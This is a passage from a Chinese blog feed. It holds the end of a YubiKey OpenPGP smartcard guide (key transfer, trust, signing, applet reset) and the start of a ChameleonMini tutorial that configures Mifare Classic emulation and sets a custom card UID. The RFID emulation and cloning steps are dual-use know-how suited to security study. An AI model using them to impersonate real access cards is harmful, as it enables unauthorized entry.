class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --edit-key F891791F</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 2.0.30; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line">Secret key is available.</span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[ultimate] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> toggle</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> keytocard</span><br><span class="line">Really move the primary key? (y/N) y</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line"></span><br><span class="line">Please select <span class="built_in">where</span> to store the key:</span><br><span class="line"> (1) Signature key</span><br><span class="line"> (3) Authentication key</span><br><span class="line">Your selection? 1</span><br><span class="line"></span><br><span class="line">You need a passphrase to unlock the secret key <span class="keyword">for</span></span><br><span class="line">user: <span class="string">"Test User <[email protected]>"</span></span><br><span class="line">4096-bit RSA key, ID F891791F, created 2017-05-29</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 1</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> keytocard</span><br><span class="line">Signature key ....: 743A 2D58 688A 9E9E B4FC 493F 70D1 D7A8 13AF CE85</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line"></span><br><span class="line">Please select <span class="built_in">where</span> to store the key:</span><br><span class="line"> (2) Encryption key</span><br><span class="line">Your selection? 2</span><br><span class="line"></span><br><span class="line">You need a passphrase to unlock the secret key <span class="keyword">for</span></span><br><span class="line">user: <span class="string">"Test User <[email protected]>"</span></span><br><span class="line">4096-bit RSA key, ID 46D4D220, created 2017-05-29</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 1</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> key 2</span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> keytocard</span><br><span class="line">Signature key ....: 743A 2D58 688A 9E9E B4FC 493F 70D1 D7A8 13AF CE85</span><br><span class="line">Encryption key....: 8D17 89A0 5C2F B804 22E5 5C04 8A68 9CC0 D742 1CDF</span><br><span class="line">Authentication key: [none]</span><br><span class="line"></span><br><span class="line">Please select <span class="built_in">where</span> to store the key:</span><br><span class="line"> (3) Authentication key</span><br><span class="line">Your selection? 3</span><br><span class="line"></span><br><span class="line">You need a passphrase to unlock the secret key <span class="keyword">for</span></span><br><span class="line">user: <span class="string">"Test User <[email protected]>"</span></span><br><span class="line">4096-bit RSA key, ID C10AE6D4, created 2017-05-29</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">sec 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb* 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">(1) Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> quit</span><br><span class="line">Save changes? (y/N) y</span><br></pre></td></tr></table></figure><p>当前密钥移动到 OpenPGP 卡后就没法再导出无须硬件卡就可直接使用的密钥了,如果你在上面的步骤没有导出备份密钥,那么 OpenPGP 卡里是私钥将是你唯一的私钥且没法备份。</p><p>查看 OpenPGP 卡状态信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --card-status</span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: Test User</span><br><span class="line">Language prefs ...: en</span><br><span class="line">Sex ..............: male</span><br><span class="line">URL of public key : https://www.example.com/public-key.asc</span><br><span class="line">Login data .......: <span class="built_in">test</span></span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 4096R 4096R 4096R</span><br><span class="line">Max. PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 3 3</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: 743A 2D58 688A 9E9E B4FC 493F 70D1 D7A8 13AF CE85</span><br><span class="line"> created ....: 2017-05-29 22:11:07</span><br><span class="line">Encryption key....: 8D17 89A0 5C2F B804 22E5 5C04 8A68 9CC0 D742 1CDF</span><br><span class="line"> created ....: 2017-05-29 22:11:07</span><br><span class="line">Authentication key: 628C 7B5D D284 224A 3321 4369 BC71 9F68 F891 791F</span><br><span class="line"> created ....: 2017-05-29 22:11:07</span><br><span class="line">General key info..: pub 4096R/F891791F 2017-05-29 Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sec> 4096R/F891791F created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb> 4096R/46D4D220 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br><span class="line">ssb> 4096R/C10AE6D4 created: 2017-05-29 expires: never</span><br><span class="line"> card-no: 0006 00000042</span><br></pre></td></tr></table></figure><h2 id="6、在其他电脑上使用"><a href="#6、在其他电脑上使用" class="headerlink" title="6、在其他电脑上使用"></a>6、在其他电脑上使用</h2><p>当你配置好了一个 YubiKey 的 OpenPGP 智能卡后你可以在其他任何支持 PGP 客户端的电脑上插上 YubiKey 使用你是私钥进行签名、加密、认证操作,而不用担心私钥泄露。</p><p>从文件导入公钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --import public-key.asc</span><br></pre></td></tr></table></figure><p>或者从公钥服务器上导入公钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --keyserver keys.gnupg.net --recv 0xF891791F</span><br></pre></td></tr></table></figure><p>插入 YubiKey 查看 OpenPGP 卡信息,这一步会自动映射 YubiKey 里的私钥到 OpenPGP 的配置里。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --card-status</span><br></pre></td></tr></table></figure><p>设置密钥在本系统上的信任状态</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --edit-key F891791F</span><br><span class="line"></span><br><span class="line">gpg (GnuPG) 1.4.21; Copyright (C) 2015 Free Software Foundation, Inc.</span><br><span class="line">This is free software: you are free to change and redistribute it.</span><br><span class="line">There is NO WARRANTY, to the extent permitted by law.</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: ultimate validity: ultimate</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[ unknown] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">gpg> trust</span><br><span class="line">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span><br><span class="line"> trust: unknown validity: unknown</span><br><span class="line">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span><br><span class="line">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span><br><span class="line">[unknown] (1). Test User <<span class="built_in">test</span>@example.com></span><br><span class="line"></span><br><span class="line">Please decide how far you trust this user to correctly verify other users<span class="string">' keys</span></span><br><span class="line"><span class="string">(by looking at passports, checking fingerprints from different sources, etc.)</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string"> 1 = I don'</span>t know or won<span class="string">'t say</span></span><br><span class="line"><span class="string"> 2 = I do NOT trust</span></span><br><span class="line"><span class="string"> 3 = I trust marginally</span></span><br><span class="line"><span class="string"> 4 = I trust fully</span></span><br><span class="line"><span class="string"> 5 = I trust ultimately</span></span><br><span class="line"><span class="string"> m = back to the main menu</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">Your decision? 5 // 输入 5 设置为终极信任</span></span><br><span class="line"><span class="string">Do you really want to set this key to ultimate trust? (y/N) y</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">pub 4096R/F891791F created: 2017-05-29 expires: never usage: SC</span></span><br><span class="line"><span class="string"> trust: ultimate validity: unknown</span></span><br><span class="line"><span class="string">sub 4096R/46D4D220 created: 2017-05-29 expires: never usage: E</span></span><br><span class="line"><span class="string">sub 4096R/C10AE6D4 created: 2017-05-29 expires: never usage: A</span></span><br><span class="line"><span class="string">[unknown] (1). Test User <[email protected]></span></span><br><span class="line"><span class="string">Please note that the shown key validity is not necessarily correct</span></span><br><span class="line"><span class="string">unless you restart the program.</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">gpg> q</span></span><br></pre></td></tr></table></figure><p>查看系统上的密钥</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">$ gpg -k // 查看所有的公钥</span><br><span class="line"></span><br><span class="line">~/.gnupg/pubring.gpg</span><br><span class="line">-----------------------------------------------</span><br><span class="line">pub 4096R/F891791F 2017-05-29</span><br><span class="line">uid [ultimate] Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">sub 4096R/46D4D220 2017-05-29</span><br><span class="line">sub 4096R/C10AE6D4 2017-05-29</span><br><span class="line"></span><br><span class="line">$ gpg -K // 查看所有的私钥</span><br><span class="line"></span><br><span class="line">~/.gnupg/secring.gpg</span><br><span class="line">-----------------------------------------------</span><br><span class="line">sec> 4096R/F891791F 2017-05-29</span><br><span class="line"> Card serial no. = 0006 00000042 // 这里可以看出这个私钥的位置是指向 OpenPGP 智能卡的</span><br><span class="line">uid Test User <<span class="built_in">test</span>@example.com></span><br><span class="line">ssb> 4096R/46D4D220 2017-05-29</span><br><span class="line">ssb> 4096R/C10AE6D4 2017-05-29</span><br></pre></td></tr></table></figure><p>公钥加密文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -ea -r <span class="built_in">test</span>@example.com msg.txt</span><br></pre></td></tr></table></figure><p>私钥解密文件</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg msg.txt.asc</span><br></pre></td></tr></table></figure><p>文件签名</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg -o msg.txt.sig -ab msg.txt</span><br></pre></td></tr></table></figure><p>签名验证</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg --verify msg.txt.sig</span><br></pre></td></tr></table></figure><h2 id="7、重置-YubiKey-4-PGP-功能"><a href="#7、重置-YubiKey-4-PGP-功能" class="headerlink" title="7、重置 YubiKey 4 PGP 功能"></a>7、重置 YubiKey 4 PGP 功能</h2><p>新建一个 <code>reset.txt</code> 的文本文件,并写入以下内容</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">/hex</span><br><span class="line">scd serialno</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 81 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 20 00 83 08 40 40 40 40 40 40 40 40</span><br><span class="line">scd apdu 00 e6 00 00</span><br><span class="line">scd apdu 00 44 00 00</span><br><span class="line">/echo Card has been successfully reset.</span><br></pre></td></tr></table></figure><p>重置 YubiKey 4 的 OpenPGP 卡功能</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">gpg-connect-agent -r reset.txt</span><br></pre></td></tr></table></figure><p>重新插拔 YubiKey 并查看 OpenPGP 卡状态信息,如果查看信息遇到错误可能是 OpenPGP 卡功能还没打开,需要通过命令手动启用。</p><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --card-status</span><br><span class="line"></span><br><span class="line">gpg: selecting openpgp failed: Card error // OpenPGP Card 错误</span><br><span class="line">gpg: OpenPGP card not available: Card error</span><br></pre></td></tr></table></figure><p>启用 OpenPGP 卡功能</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">gpg-connect-agent -–hex</span><br><span class="line">> scd apdu 00 44 00 00</span><br><span class="line">D[0000] 90 00 ..</span><br><span class="line">OK</span><br><span class="line">> // 直接回车推出</span><br></pre></td></tr></table></figure><p>手动启用 <code>OK</code> 后你可能还需要重新插拔 YubiKey 再重新查看 OpenPGP 卡状态信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">$ gpg --card-status</span><br><span class="line"></span><br><span class="line">Application ID ...: D2760001240102000060000000420000</span><br><span class="line">Version ..........: 2.1</span><br><span class="line">Manufacturer .....: Yubico</span><br><span class="line">Serial number ....: 00000042</span><br><span class="line">Name of cardholder: [not <span class="built_in">set</span>]</span><br><span class="line">Language prefs ...: [not <span class="built_in">set</span>]</span><br><span class="line">Sex ..............: unspecified</span><br><span class="line">URL of public key : [not <span class="built_in">set</span>]</span><br><span class="line">Login data .......: [not <span class="built_in">set</span>]</span><br><span class="line">Signature PIN ....: forced</span><br><span class="line">Key attributes ...: 2048R 2048R 2048R</span><br><span class="line">Max. PIN lengths .: 127 127 127</span><br><span class="line">PIN retry counter : 3 0 3</span><br><span class="line">Signature counter : 0</span><br><span class="line">Signature key ....: [none]</span><br><span class="line">Encryption key....: [none]</span><br><span class="line">Authentication key: [none]</span><br><span class="line">General key info..: [none]</span><br></pre></td></tr></table></figure><p>重置后的 OpenPGP 卡可以重新进行配置。</p><hr><h3 id="链接"><a href="#链接" class="headerlink" title="链接"></a>链接</h3><ul><li><a href="https://www.gnupg.org/gph/en/manual.html" target="_blank" rel="noopener">The GNU Privacy Handbook</a></li><li><a href="https://developers.yubico.com/PGP/" target="_blank" rel="noopener">YubiKey PGP</a></li><li><a href="https://www.yubico.com/support/knowledge-base/categories/articles/use-yubikey-openpgp/" target="_blank" rel="noopener">How to Use Your YubiKey With OpenPGP</a></li><li><a href="https://developers.yubico.com/yubikey-piv-manager/PIN_and_Management_Key.html" target="_blank" rel="noopener">PIN and Management Key</a></li><li><a href="https://www.yubico.com/support/knowledge-base/categories/articles/reset-applet-yubikey/" target="_blank" rel="noopener">How to Reset Your Applet on Your YubiKey</a></li><li><a href="https://developers.yubico.com/ykneo-openpgp/ResetApplet.html" target="_blank" rel="noopener">YubiKey ResetApplet</a></li><li><a href="https://openpgpcard.org/makecard/" target="_blank" rel="noopener">Make OpenPGP Card</a></li><li><a href="https://github.com/drduh/YubiKey-Guide" target="_blank" rel="noopener">Guide to using YubiKey as a SmartCard for GPG and SSH</a></li><li><a href="https://spin.atomicobject.com/2014/02/09/gnupg-openpgp-smartcard/" target="_blank" rel="noopener">Using an OpenPGP Smartcard with GnuPG</a></li><li><a href="https://www.sidorenko.io/blog/2014/11/04/yubikey-slash-openpgp-smartcards-for-newbies/" target="_blank" rel="noopener">Yubikey/OpenPGP Smartcards for Newbies</a></li><li><a href="https://www.esev.com/blog/post/2015-01-pgp-ssh-key-on-yubikey-neo/" target="_blank" rel="noopener">PGP and SSH keys on a Yubikey NEO</a></li><li><a href="https://www.jfry.me/articles/2015/gpg-smartcard/" target="_blank" rel="noopener">Using GPG with Smart Cards</a></li></ul>]]></content>
<summary type="html">
<p><a href="https://www.yubico.com/" target="_blank" rel="noopener">YubiKey</a> 是一款用于安全认证的硬件工具,其中的 YubiKey 4, YubiKey 4 Nano, YubiKey 4C, YubiKey NEO, YubiKey NEO-n,这些产品型号是包含 OpenPGP Card 功能的。</p>
<p>你可将你的私钥移动到 YubiKey 里,在需要使用的时候插上,而不必担心私钥泄露或被恶意程序盗取,并且支持在多种操作系统上使用。</p>
</summary>
<category term="YubiKey" scheme="https://blog.iternull.com/tags/YubiKey/"/>
<category term="PGP" scheme="https://blog.iternull.com/tags/PGP/"/>
</entry>
<entry>
<title>ChameleonMini 使用教程</title>
<link href="https://blog.iternull.com/posts/2017/05/22/ChameleonMini-Tutorial.html"/>
<id>https://blog.iternull.com/posts/2017/05/22/ChameleonMini-Tutorial.html</id>
<published>2017-05-22T15:58:47.000Z</published>
<updated>2018-07-05T05:38:22.526Z</updated>
<content type="html"><![CDATA[<p><a href="https://github.com/emsec/ChameleonMini" target="_blank" rel="noopener">ChameleonMini</a> 是一款可编程的 NFC 安全分析工具的开源硬件项目,可以用于嗅探、模拟和克隆非接触式智能卡 (RFID Card)。<br>ChameleonMini 常见的有两个版本 <strong>ChameleonMini Rev.E</strong> 与 <strong>ChameleonMini Rev.G</strong> 其中 Rev.G 是最新升级的版本,自带电池供电。</p><a id="more"></a><h4 id="Rev-G-版本特点"><a href="#Rev-G-版本特点" class="headerlink" title="Rev.G 版本特点"></a>Rev.G 版本特点</h4><ul><li>固件支持 ISO14443A 编解码器(仿真和读卡器)</li><li>固件支持 Mifare Classic 1K 和 4K 仿真( 4 和 7 字节 UID)</li><li>固件支持 Mifare Ultralight 仿真</li><li>硬件支持 ASK 调制(均为 10% 和 100% ),可覆盖几乎所有可用的卡标准</li><li>使用子载波的 ASK 和 BPSK 负载调制的硬件支持</li><li>模块化固件结构允许其他卡和标准的易扩展性</li><li>支持通过 Atmel DFU 引导加载程序,快速可靠的固件更新,因此只需要一次编程硬件</li><li>可以使用 <a href="http://www.fourwalledcubicle.com/LUFA.php" target="_blank" rel="noopener">LUFA USB stack</a> 通过 CDC 使用完全记录的 AT 类命令进行控制</li><li>可以存储最多 8 个虚拟化卡,每个卡大小最多可达 8 KB,存储在 ChameleonMini 的非易失性存储器中</li><li>卡数据可以通过命令行和 X-MODEM 轻松上传和下载</li><li>符合 ISO14443A 标准的卡 UID 可以在阅读器模式下轻松获得</li><li>识别 ISO14443A 卡的类型 (Mifare Ultralight, Mifare Classic 1k, …) 也可以在阅读器模式</li><li>透明/手动 ISO14443A 阅读器:通过发送自定义数据位从而获取卡片内的数据应答</li><li>从而允许 ChameleonMini 与标准串口终端软件以及用户编写的脚本和应用程序连接</li></ul><h3 id="安装客户端"><a href="#安装客户端" class="headerlink" title="安装客户端"></a>安装客户端</h3><p>ChameleonMini 常见的支持两种跨平台的方式来进行硬件的操控,一种是使用命令行终端软件用命令进行操控,另一种是使用官方自带的一个用 Python 编写的工具实现操控。在 Windows 平台上还有第三方编写的 GUI 客户端软件。</p><h4 id="Windows"><a href="#Windows" class="headerlink" title="Windows"></a>Windows</h4><p>在 Windows 上使用需要先安装驱动,安装方法参考 <a href="http://wiki.radiowar.org/Proxmark3#Proxmark3.E9.A9.B1.E5.8A.A8.E5.AE.89.E8.A3.85" target="_blank" rel="noopener">Proxmark3 驱动安装</a>,驱动文件在 <a href="https://github.com/emsec/ChameleonMini" target="_blank" rel="noopener">ChameleonMini</a> 项目文件的 ChameleonMini/Drivers/ 文件夹里(RevE 版本在 RevE/ 文件夹里)。<br>Windows 上也能通过诸如 <a href="https://osdn.net/projects/ttssh2/releases/" target="_blank" rel="noopener">TeraTerm</a>, <a href="https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html" target="_blank" rel="noopener">PuTTY</a> 之类的支持 COM 串口通信的命令行软件进行操作。这里不重复讲解,可以参考 Linux 部分的使用方法。</p><p>ChameleonMini GUI 客户端:<a href="http://bronken.de/chameleonminigui/" target="_blank" rel="noopener">http://bronken.de/chameleonminigui/</a></p><h4 id="Linux"><a href="#Linux" class="headerlink" title="Linux"></a>Linux</h4><p>在 Linux 上可以使用 <code>cu, minicom, socat</code> 等客户端对硬件进行控制,这里我们使用 <code>socat</code> 工具。</p><p>安装 socat</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">apt-get install socat</span><br></pre></td></tr></table></figure><p>连接 ChameleonMini 到电脑,并通过命令行控制设备。</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">socat - /dev/ttyACM0,crnl</span><br></pre></td></tr></table></figure><p>获取固件版本信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">VERSION? // 你输入的命令(这里并不会有命令行提示符显示)</span><br><span class="line">101:OK WITH TEXT // 设备返回的确认信息</span><br><span class="line">Chameleon-Mini 150304 using LUFA 130901 compiled with AVR-GCC 4.8.1 // 设备返回的数据信息</span><br></pre></td></tr></table></figure><p>获取配置与设置配置信息</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">config? // 你输入的命令(查看当前配置的卡信息)</span><br><span class="line">101:OK WITH TEXT // 设备返回的确认信息</span><br><span class="line">MF_UL TRALIGHT // 设备返回的数据信息</span><br><span class="line">config // 你输入的命令(查看所有可配置的卡)</span><br><span class="line">101:OK WITH TEXT // 设备返回的确认信息</span><br><span class="line">NONE,MF_ULTRALIGHT,MF_CLASSIC_1K,MF_PLUS1K_7B,MF_CLASSIC_4K,ISO14443A_SNIFF // 设备返回的数据信息</span><br><span class="line">config=MF_CLASSIC_1K // 你输入的命令(配置当前卡为 Mifare Classic 1K 卡)</span><br><span class="line">100:OK // 设备返回的确认信息</span><br><span class="line">config? // 你输入的命令(查看当前配置的卡信息)</span><br><span class="line">101:OK WITH TEXT // 设备返回的确认信息</span><br><span class="line">MF_CLASSIC_1K // 设备返回的数据信息(当前配置为 Mifare Classic 1K 卡)</span><br></pre></td></tr></table></figure><p>设置模拟 Mifare Classic 1K 卡的 UID</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">uid? // 你输入的命令(查看当前的 UID)</span><br><span class="line">101:OK WITH TEXT // 设备返回的确认信息</span><br><span class="line">00000000 // 设备返回的数据信息(当前 UID 为 00000000)</span><br><span class="line">uid=ABCD1234 // 你输入的命令(设置 UID 为 ABCD1234)</span><br><span class="line">100:OK // 设备返回的确认信息</span><br><span class="line">uid? // 你输入的命令(查看当前的 UID)</span><br><span class="line">101:OK WITH TEXT // 设备返回的确认信息</span><br><span class="line">ABCD1234 // 设备返回的数据信息(当前 UID 为 ABCD1234)</span><br></pre></td></tr></table></figure><h4 id="ChamTool-py"><a href="#ChamTool-py" class="headerlink" title="ChamTool.py"></a>ChamTool.py</h4><p>ChamTool.py 是 ChameleonMini 项目官方自带的一个用 Python 编写的客户端工具,可跨平台使用。</p><p>安装 Python 和依赖包</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">apt-get install python3 python3-pip</span><br><span 